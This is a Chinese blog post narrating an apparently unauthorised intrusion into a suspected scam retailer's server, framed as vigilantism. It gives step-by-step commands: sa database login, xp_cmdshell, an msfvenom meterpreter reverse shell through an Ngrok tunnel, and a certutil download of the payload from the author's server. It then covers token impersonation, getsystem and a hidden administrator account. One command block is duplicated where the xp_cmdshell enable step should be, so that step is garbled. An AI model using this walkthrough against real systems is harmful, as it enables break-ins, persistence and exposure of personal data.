记一次渗透测试实战

免责声明

本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。

因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与NowSec及分享者无关

0.起因

博主从周一到周五一直在收同一个公司发送的垃圾短信(这从短信链接中的域名可以看出),但是当博主点进网页看的时候,发现这是可以说是一家骗子网站吧。网站所卖的东西 都是衣服、纪念币、眼镜以及蓝牙耳机等等之类的东西。但是自习观察会发现这不是一个正常的购物网站。现在都9102年了,哪个网站会仅支持货到付款的方式,而且还是买一送一的那种,所以博主在接受了一周的垃圾短信之后,决定要拿下这个站。不,这这台服务器。后来当第一次链接到数据库的时候,发现有两个库中的订单表中公民个人身份信息竟存储高达80W+条。但是观察他们的发货情况,又是选择性的发货,而这些包裹大多是一些廉价的东西,甚至有些是空包裹,然后快递到达后需要支付几百元的快递费用。导致我们受到经济损失。所以本着为民除害的前提,对该站进行了渗透测试,后续将在进一步调查取证后,将提交给相关部门进行进一步处理。

对于这次渗透测试,整体难度等级比较低,因为网站存在网站整站备份的敏感文件泄露,所以可以通过代码审计的方式,非常快速的找到我们需要的东西。但是对于新手来说,内网穿透是一个需要研究时间比较常的环节,可以尝试Ngrok或Frp

1.首先通过AWVS扫描目标网站,发现有网站备份文件泄露,将备份文件下载下来后,对代码进行审计,发现有连接连接数据库的文件,而且是sa账户,我们来连接数据库。

2.使用Navicat 连接数据库

3.连接上数据库我们可以看到是sa用户,我们可以尝试开启xp_cmdshell,来进行命令执行

命令:

sp_configure 'show advanced options',1
reconfigure
go

sp_configure 'show advanced options',1
reconfigure
go

这里我们启用xp_cmdshell组件功能,然后我们尝试执行一些命令。

4.我们使用xp_cmdshell组件执行ipconfig命令,查看一下服务器IP地址

5.下面我们使用whoami命令查看一下我们当前的用户,发现是mssqlserver权限,这个权限并不高,不是我们想要的。

6.因为我们的kali处于内网环境,而公网的shell无法直接反弹回来,所以我们要做一个内网穿透。

①内网穿透服务。

网址:Sunny-Ngrok内网转发内网穿透 - 国内内网映射服务器

注册账号之后,可以先开通一个免费的ngrok隧道。

这里我们来解释一下这几个选项应该怎么选,空应该怎么填。

隧道协议:选择tcp

隧道名称:这个名称可以随意填写

远程端口:远程端口是我们开通ngrok隧道服务器的端口。这里我们可以在1024-65535之间选择一个没有被占用的端口即可。

本地端口:这里填写我们kali或我们攻击机内网的IP地址和需要本地映射的端口,一般建议远程端口和本地端口保持一致即可。

设设置完成后点击确认添加

确认添加之后我们需要下载一个客户端来连接我们的服务端。

我们选择Ngrok客户端进行下载

但是当我们点击进去之后发现有很多个版本供我们选择

当我们不知道选择哪个版本的时候,我们需要看一下我们的kali或攻击机的架构,是由arch命令进行查看

可以看到是x86_64,所以我们下载64位版本即可。

我们将下载好的文件拷贝只kali的目录下进行执行连接服务器

命令:

Sunny clientid 隧道ID

注:隧道ID在开通ngrok隧道中查看

连接好之后我们可以看到这事ngrok是一个在线的状态。

7.接下来我们生成木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=free.idcf*****.com lport=19*** -f exe > FileName.exe

参数说明:

Lhost:Ngrok服务器:给定的免费域名

Lport:远程端口

FilenName.exe:生成木马的文件名

8.木马生成之后,我们就要想办法将木马下载到我们的目标服务器上。这里我们可以使用certutil.exe来进行下载

master..xp_cmdshell 'certutil.exe -urlcache -split -f http://www.ike***.com/InternetExploreUpdate.exe c:\test\InternetExploreUpdate.exe'

注:这里我使用自己的一台服务器进行下载。

我们将木马程序下载至目标服务器C盘的test文件夹下。当然这个目录是需要提前创建好的,而且在mssqlserver用户权限下是可以进行创建的。

9.在kali进行设置监听

使用msfconsole命令进入msf

①use exploit/multi/handler

设置使用exploit/multi/handler模块

②set payload windows/meterpreter/reverse_tcp

设置payload

③set LHOST kali本机IP地址

设置本机的IP地址

④set LPORT 19864

设置本地监听端口

10.在数据库中使用xp_cmdshell执行我们上传的木马文件。

11. 在kali’中执行run命令后,稍等片刻,就会返回一个目标服务器的shell

12.返回shell之后我们查看一下用户,发现还是mssqlserver,但是这并不是我们想要的。

13.使用use incognito来加载会话令牌模块

14.使用list_tokens -u来列出会话令牌。

15. 使用impersonate_token "WIN-C1KQQ8MIB6A\Administrator" 盗取 administrator 令牌

16.我们继续查看返回shell用户的,发现已经是管理员用户了,但是这对我们来说还不够

17.使用getsystem来获取system权限,通过getuid查看我们获取到了system权限

18.使用shell命令,将目标服务器中的shell反弹回来。

19.使用whoami查看当前用户,可以看到是system

20.使用systeminfo查看系统信息,发现存在乱码

21.使用chcp 65001进行修改

22.再次执行systeminfo,可以看到已经全部回复正常。

23.创建隐藏账户

24.将用户加入到管理员组中

25.远程连接目标服务器,我们可以看到连接成功。

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值